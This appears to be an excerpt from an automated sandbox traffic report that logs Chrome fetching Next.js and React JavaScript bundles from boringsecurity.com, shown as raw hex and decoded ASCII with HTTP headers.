                                                                          Data Ascii: !function(){"use strict";var e,t,n,r,o,u,i,c,f,a={},d={};function l(e){var t=d[e];if(void 0!==t)return t.exports;var n=d[e]={id:e,loaded:!1,exports:{}},r=!0;try{a[e].call(n.exports,n,n.exports,l),r=!1}finally{r&&delete d[e]}return n.loaded=!0,n.exports}l.
                                                                          2023-12-10 16:44:48 UTC2372INData Raw: 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7d 2c 6c 2e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 69 66 28 31 26 72 26 26 28 65 3d 74 68 69 73 28 65 29 29 2c 38 26 72 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 26 26 28 34 26 72 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 7c 7c 31 36 26 72 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 68 65 6e 29 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 3b 6c 2e 72 28 6f 29 3b 76 61 72 20 75 3d 7b 7d 3b 74 3d 74 7c 7c 5b 6e 75 6c 6c 2c 6e
                                                                          Data Ascii: tion(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__},l.t=function(e,r){if(1&r&&(e=this(e)),8&r||"object"==typeof e&&e&&(4&r&&e.__esModule||16&r&&"function"==typeof e.then))return e;var o=Object.create(null);l.r(o);var u={};t=t||[null,n
                                                                          2023-12-10 16:44:48 UTC538INData Raw: 73 74 65 64 54 79 70 65 73 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 26 26 28 75 3d 74 72 75 73 74 65 64 54 79 70 65 73 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 22 6e 65 78 74 6a 73 23 62 75 6e 64 6c 65 72 22 2c 75 29 29 29 2c 75 7d 2c 6c 2e 74 75 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6c 2e 74 74 28 29 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 65 29 7d 2c 6c 2e 70 3d 22 2f 5f 6e 65 78 74 2f 22 2c 69 3d 7b 32 37 32 3a 30 7d 2c 6c 2e 66 2e 6a 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 6c 2e 6f 28 69 2c 65 29 3f 69 5b 65 5d 3a 76 6f 69 64 20 30 3b 69 66 28 30 21 3d 3d 6e 29 7b 69 66 28 6e 29 74 2e 70 75 73 68 28 6e 5b 32 5d 29 3b 65 6c 73 65 20 69 66 28 32 37 32 21 3d 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 50
                                                                          Data Ascii: stedTypes.createPolicy&&(u=trustedTypes.createPolicy("nextjs#bundler",u))),u},l.tu=function(e){return l.tt().createScriptURL(e)},l.p="/_next/",i={272:0},l.f.j=function(e,t){var n=l.o(i,e)?i[e]:void 0;if(0!==n){if(n)t.push(n[2]);else if(272!=e){var r=new P
                                                                          2023-12-10 16:44:48 UTC442INData Raw: 4c 6f 61 64 45 72 72 6f 72 22 2c 75 2e 74 79 70 65 3d 72 2c 75 2e 72 65 71 75 65 73 74 3d 6f 2c 6e 5b 31 5d 28 75 29 7d 7d 2c 22 63 68 75 6e 6b 2d 22 2b 65 2c 65 29 7d 65 6c 73 65 20 69 5b 65 5d 3d 30 7d 7d 2c 6c 2e 4f 2e 6a 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 30 3d 3d 3d 69 5b 65 5d 7d 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 3d 74 5b 30 5d 2c 75 3d 74 5b 31 5d 2c 63 3d 74 5b 32 5d 2c 66 3d 30 3b 69 66 28 6f 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 30 21 3d 3d 69 5b 65 5d 7d 29 29 7b 66 6f 72 28 6e 20 69 6e 20 75 29 6c 2e 6f 28 75 2c 6e 29 26 26 28 6c 2e 6d 5b 6e 5d 3d 75 5b 6e 5d 29 3b 69 66 28 63 29 76 61 72 20 61 3d 63 28 6c 29 7d 66 6f 72 28 65 26 26 65 28
                                                                          Data Ascii: LoadError",u.type=r,u.request=o,n[1](u)}},"chunk-"+e,e)}else i[e]=0}},l.O.j=function(e){return 0===i[e]},c=function(e,t){var n,r,o=t[0],u=t[1],c=t[2],f=0;if(o.some(function(e){return 0!==i[e]})){for(n in u)l.o(u,n)&&(l.m[n]=u[n]);if(c)var a=c(l)}for(e&&e(


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          79192.168.2.54980875.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:48 UTC570OUTGET /_next/static/chunks/framework-281bd828f4ecdac7.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:48 UTC424INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 34 31 30 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 34 38 20 47 4d 54 0d 0a 45 74 61 67 3a
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Length: 141072Content-Type: application/javascript; charset=UTF-8Date: Sun, 10 Dec 2023 16:44:48 GMTEtag:
                                                                          2023-12-10 16:44:48 UTC762INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 37 34 5d 2c 7b 35 33 37 34 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 2f 2a 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 20 52 65 61 63 74 0a 20 2a 20 72 65 61 63 74 2d 64 6f 6d 2e 70 72 6f 64 75 63 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 61 6e 64 20 69 74 73 20 61 66 66 69 6c 69 61 74 65 73 2e 0a 20 2a 0a 20 2a 20 54 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20
                                                                          Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[774],{53746:function(e,n,t){/** * @license React * react-dom.production.min.js * * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT
                                                                          2023-12-10 16:44:48 UTC2372INData Raw: 65 2c 6e 29 7b 66 6f 72 28 70 5b 65 5d 3d 6e 2c 65 3d 30 3b 65 3c 6e 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 64 2e 61 64 64 28 6e 5b 65 5d 29 7d 76 61 72 20 67 3d 21 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 7c 7c 76 6f 69 64 20 30 3d 3d 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 7c 7c 76 6f 69 64 20 30 3d 3d 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 29 2c 76 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 79 3d 2f 5e 5b 3a 41 2d 5a 5f 61 2d 7a 5c 75 30 30 43 30 2d 5c 75 30 30 44 36 5c 75 30 30 44 38 2d 5c 75 30 30 46 36 5c 75 30 30 46 38 2d 5c 75 30 32 46 46 5c 75 30 33 37 30 2d 5c 75 30 33 37 44 5c 75 30 33 37 46 2d
                                                                          Data Ascii: e,n){for(p[e]=n,e=0;e<n.length;e++)d.add(n[e])}var g=!("undefined"==typeof window||void 0===window.document||void 0===window.document.createElement),v=Object.prototype.hasOwnProperty,y=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-
                                                                          2023-12-10 16:44:48 UTC538INData Raw: 73 65 22 73 79 6d 62 6f 6c 22 3a 72 65 74 75 72 6e 21 30 3b 63 61 73 65 22 62 6f 6f 6c 65 61 6e 22 3a 69 66 28 72 29 72 65 74 75 72 6e 21 31 3b 69 66 28 6e 75 6c 6c 21 3d 3d 74 29 72 65 74 75 72 6e 21 74 2e 61 63 63 65 70 74 73 42 6f 6f 6c 65 61 6e 73 3b 72 65 74 75 72 6e 22 64 61 74 61 2d 22 21 3d 3d 28 65 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 73 6c 69 63 65 28 30 2c 35 29 29 26 26 22 61 72 69 61 2d 22 21 3d 3d 65 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 21 31 7d 7d 28 65 2c 6e 2c 74 2c 72 29 29 72 65 74 75 72 6e 21 30 3b 69 66 28 72 29 72 65 74 75 72 6e 21 31 3b 69 66 28 6e 75 6c 6c 21 3d 3d 74 29 73 77 69 74 63 68 28 74 2e 74 79 70 65 29 7b 63 61 73 65 20 33 3a 72 65 74 75 72 6e 21 6e 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 21 31 3d
                                                                          Data Ascii: se"symbol":return!0;case"boolean":if(r)return!1;if(null!==t)return!t.acceptsBooleans;return"data-"!==(e=e.toLowerCase().slice(0,5))&&"aria-"!==e;default:return!1}}(e,n,t,r))return!0;if(r)return!1;if(null!==t)switch(t.type){case 3:return!n;case 4:return!1=
                                                                          2023-12-10 16:44:48 UTC4096INData Raw: 3a 28 6e 3d 61 2e 61 74 74 72 69 62 75 74 65 4e 61 6d 65 2c 72 3d 61 2e 61 74 74 72 69 62 75 74 65 4e 61 6d 65 73 70 61 63 65 2c 6e 75 6c 6c 3d 3d 3d 74 3f 65 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 6e 29 3a 28 74 3d 33 3d 3d 3d 28 61 3d 61 2e 74 79 70 65 29 7c 7c 34 3d 3d 3d 61 26 26 21 30 3d 3d 3d 74 3f 22 22 3a 22 22 2b 74 2c 72 3f 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 4e 53 28 72 2c 6e 2c 74 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6e 2c 74 29 29 29 29 7d 22 61 63 63 65 6e 74 2d 68 65 69 67 68 74 20 61 6c 69 67 6e 6d 65 6e 74 2d 62 61 73 65 6c 69 6e 65 20 61 72 61 62 69 63 2d 66 6f 72 6d 20 62 61 73 65 6c 69 6e 65 2d 73 68 69 66 74 20 63 61 70 2d 68 65 69 67 68 74 20 63 6c 69 70 2d 70 61 74 68 20 63 6c 69 70 2d 72 75 6c 65 20
                                                                          Data Ascii: :(n=a.attributeName,r=a.attributeNamespace,null===t?e.removeAttribute(n):(t=3===(a=a.type)||4===a&&!0===t?"":""+t,r?e.setAttributeNS(r,n,t):e.setAttribute(n,t))))}"accent-height alignment-baseline arabic-form baseline-shift cap-height clip-path clip-rule
                                                                          2023-12-10 16:44:48 UTC5930INData Raw: 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 70 72 6f 74 6f 74 79 70 65 2c 6e 29 2c 72 3d 22 22 2b 65 5b 6e 5d 3b 69 66 28 21 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6e 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 73 65 74 29 7b 76 61 72 20 6c 3d 74 2e 67 65 74 2c 61 3d 74 2e 73 65 74 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 2e 63 61 6c 6c
                                                                          Data Ascii: bject.getOwnPropertyDescriptor(e.constructor.prototype,n),r=""+e[n];if(!e.hasOwnProperty(n)&&void 0!==t&&"function"==typeof t.get&&"function"==typeof t.set){var l=t.get,a=t.set;return Object.defineProperty(e,n,{configurable:!0,get:function(){return l.call
                                                                          2023-12-10 16:44:48 UTC7116INData Raw: 61 73 65 22 66 6f 6e 74 2d 66 61 63 65 2d 73 72 63 22 3a 63 61 73 65 22 66 6f 6e 74 2d 66 61 63 65 2d 75 72 69 22 3a 63 61 73 65 22 66 6f 6e 74 2d 66 61 63 65 2d 66 6f 72 6d 61 74 22 3a 63 61 73 65 22 66 6f 6e 74 2d 66 61 63 65 2d 6e 61 6d 65 22 3a 63 61 73 65 22 6d 69 73 73 69 6e 67 2d 67 6c 79 70 68 22 3a 72 65 74 75 72 6e 21 31 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 21 30 7d 7d 76 61 72 20 65 78 3d 6e 75 6c 6c 3b 66 75 6e 63 74 69 6f 6e 20 65 45 28 65 29 7b 72 65 74 75 72 6e 28 65 3d 65 2e 74 61 72 67 65 74 7c 7c 65 2e 73 72 63 45 6c 65 6d 65 6e 74 7c 7c 77 69 6e 64 6f 77 29 2e 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 55 73 65 45 6c 65 6d 65 6e 74 26 26 28 65 3d 65 2e 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 55 73 65 45 6c 65 6d 65 6e 74 29 2c 33 3d
                                                                          Data Ascii: ase"font-face-src":case"font-face-uri":case"font-face-format":case"font-face-name":case"missing-glyph":return!1;default:return!0}}var ex=null;function eE(e){return(e=e.target||e.srcElement||window).correspondingUseElement&&(e=e.correspondingUseElement),3=
                                                                          2023-12-10 16:44:48 UTC8302INData Raw: 6e 3b 29 6e 4e 28 74 29 2c 6e 75 6c 6c 3d 3d 3d 74 2e 62 6c 6f 63 6b 65 64 4f 6e 26 26 6e 45 2e 73 68 69 66 74 28 29 7d 76 61 72 20 6e 46 3d 43 2e 52 65 61 63 74 43 75 72 72 65 6e 74 42 61 74 63 68 43 6f 6e 66 69 67 2c 6e 4f 3d 21 30 3b 66 75 6e 63 74 69 6f 6e 20 6e 44 28 65 2c 6e 2c 74 2c 72 29 7b 76 61 72 20 6c 3d 6e 63 2c 61 3d 6e 46 2e 74 72 61 6e 73 69 74 69 6f 6e 3b 6e 46 2e 74 72 61 6e 73 69 74 69 6f 6e 3d 6e 75 6c 6c 3b 74 72 79 7b 6e 63 3d 31 2c 6e 55 28 65 2c 6e 2c 74 2c 72 29 7d 66 69 6e 61 6c 6c 79 7b 6e 63 3d 6c 2c 6e 46 2e 74 72 61 6e 73 69 74 69 6f 6e 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 49 28 65 2c 6e 2c 74 2c 72 29 7b 76 61 72 20 6c 3d 6e 63 2c 61 3d 6e 46 2e 74 72 61 6e 73 69 74 69 6f 6e 3b 6e 46 2e 74 72 61 6e 73 69 74 69 6f 6e 3d
                                                                          Data Ascii: n;)nN(t),null===t.blockedOn&&nE.shift()}var nF=C.ReactCurrentBatchConfig,nO=!0;function nD(e,n,t,r){var l=nc,a=nF.transition;nF.transition=null;try{nc=1,nU(e,n,t,r)}finally{nc=l,nF.transition=a}}function nI(e,n,t,r){var l=nc,a=nF.transition;nF.transition=
                                                                          2023-12-10 16:44:48 UTC9488INData Raw: 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 69 73 3f 4f 62 6a 65 63 74 2e 69 73 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 6e 26 26 28 30 21 3d 3d 65 7c 7c 31 2f 65 3d 3d 31 2f 6e 29 7c 7c 65 21 3d 65 26 26 6e 21 3d 6e 7d 3b 66 75 6e 63 74 69 6f 6e 20 74 49 28 65 2c 6e 29 7b 69 66 28 74 44 28 65 2c 6e 29 29 72 65 74 75 72 6e 21 30 3b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 65 7c 7c 6e 75 6c 6c 3d 3d 3d 65 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 6e 7c 7c 6e 75 6c 6c 3d 3d 3d 6e 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2c 72 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6e 29 3b 69 66 28 74 2e 6c 65 6e 67 74
                                                                          Data Ascii: ="function"==typeof Object.is?Object.is:function(e,n){return e===n&&(0!==e||1/e==1/n)||e!=e&&n!=n};function tI(e,n){if(tD(e,n))return!0;if("object"!=typeof e||null===e||"object"!=typeof n||null===n)return!1;var t=Object.keys(e),r=Object.keys(n);if(t.lengt
                                                                          2023-12-10 16:44:48 UTC1541INData Raw: 62 3d 76 6f 69 64 20 30 7d 65 6c 73 65 20 74 79 3f 74 67 28 65 2c 74 29 26 26 28 62 3d 22 6f 6e 43 6f 6d 70 6f 73 69 74 69 6f 6e 45 6e 64 22 29 3a 22 6b 65 79 64 6f 77 6e 22 3d 3d 3d 65 26 26 32 32 39 3d 3d 3d 74 2e 6b 65 79 43 6f 64 65 26 26 28 62 3d 22 6f 6e 43 6f 6d 70 6f 73 69 74 69 6f 6e 53 74 61 72 74 22 29 3b 62 26 26 28 74 6d 26 26 22 6b 6f 22 21 3d 3d 74 2e 6c 6f 63 61 6c 65 26 26 28 74 79 7c 7c 22 6f 6e 43 6f 6d 70 6f 73 69 74 69 6f 6e 53 74 61 72 74 22 21 3d 3d 62 3f 22 6f 6e 43 6f 6d 70 6f 73 69 74 69 6f 6e 45 6e 64 22 3d 3d 3d 62 26 26 74 79 26 26 28 67 3d 6e 57 28 29 29 3a 28 6e 42 3d 22 76 61 6c 75 65 22 69 6e 28 6e 6a 3d 6c 29 3f 6e 6a 2e 76 61 6c 75 65 3a 6e 6a 2e 74 65 78 74 43 6f 6e 74 65 6e 74 2c 74 79 3d 21 30 29 29 2c 30 3c 28 79 3d
                                                                          Data Ascii: b=void 0}else ty?tg(e,t)&&(b="onCompositionEnd"):"keydown"===e&&229===t.keyCode&&(b="onCompositionStart");b&&(tm&&"ko"!==t.locale&&(ty||"onCompositionStart"!==b?"onCompositionEnd"===b&&ty&&(g=nW()):(nB="value"in(nj=l)?nj.value:nj.textContent,ty=!0)),0<(y=


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          80192.168.2.54981075.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:48 UTC565OUTGET /_next/static/chunks/main-92fafea216160eb7.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:48 UTC423INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 32 38 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 34 38 20 47 4d 54 0d 0a 45 74 61 67 3a 20
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Length: 92844Content-Type: application/javascript; charset=UTF-8Date: Sun, 10 Dec 2023 16:44:48 GMTEtag:
                                                                          2023-12-10 16:44:48 UTC763INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 37 39 5d 2c 7b 38 39 32 31 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 2c 72 2c 6e 2c 61 2c 6f 2c 6c 29 7b 74 72 79 7b 76 61 72 20 69 3d 65 5b 6f 5d 28 6c 29 2c 73 3d 69 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 65 29 7b 72 28 65 29 3b 72 65 74 75 72 6e 7d 69 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6e 2c 61 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c
                                                                          Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{89219:function(e,t){"use strict";function r(e,t,r,n,a,o,l){try{var i=e[o](l),s=i.value}catch(e){r(e);return}i.done?t(s):Promise.resolve(s).then(n,a)}function n(e){return function(){var t=this,
                                                                          2023-12-10 16:44:48 UTC2372INData Raw: 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5a 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 7d 29 7d 2c 31 33 32 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 3a 7b 64 65 66 61 75 6c 74 3a 65 7d 7d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5a 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 7d 2c 36 36 38 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66
                                                                          Data Ascii: ect.defineProperty(t,"Z",{enumerable:!0,get:function(){return n}})},1322:function(e,t){"use strict";function r(e){return e&&e.__esModule?e:{default:e}}Object.defineProperty(t,"Z",{enumerable:!0,get:function(){return r}})},6687:function(e,t){"use strict";f
                                                                          2023-12-10 16:44:48 UTC538INData Raw: 75 6c 74 26 26 6e 75 6c 6c 21 3d 3d 74 2e 64 65 66 61 75 6c 74 29 26 26 76 6f 69 64 20 30 3d 3d 3d 74 2e 64 65 66 61 75 6c 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 26 26 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2e 64 65 66 61 75 6c 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 2e 64 65 66 61 75 6c 74 2c 74 29 2c 65 2e 65 78 70 6f 72 74 73 3d 74 2e 64 65 66 61 75 6c 74 29 7d 2c 34 37 35 39 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 61 64 64 4c 6f 63 61
                                                                          Data Ascii: ult&&null!==t.default)&&void 0===t.default.__esModule&&(Object.defineProperty(t.default,"__esModule",{value:!0}),Object.assign(t.default,t),e.exports=t.default)},47592:function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.addLoca
                                                                          2023-12-10 16:44:48 UTC4744INData Raw: 66 61 75 6c 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 26 26 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2e 64 65 66 61 75 6c 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 2e 64 65 66 61 75 6c 74 2c 74 29 2c 65 2e 65 78 70 6f 72 74 73 3d 74 2e 64 65 66 61 75 6c 74 29 7d 2c 37 32 30 37 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 64 65 74 65 63 74 44 6f 6d 61 69 6e 4c 6f 63 61 6c 65 3d 76 6f 69 64 20 30 2c 74 2e 64 65 74 65 63 74 44 6f 6d 61 69 6e 4c 6f 63 61
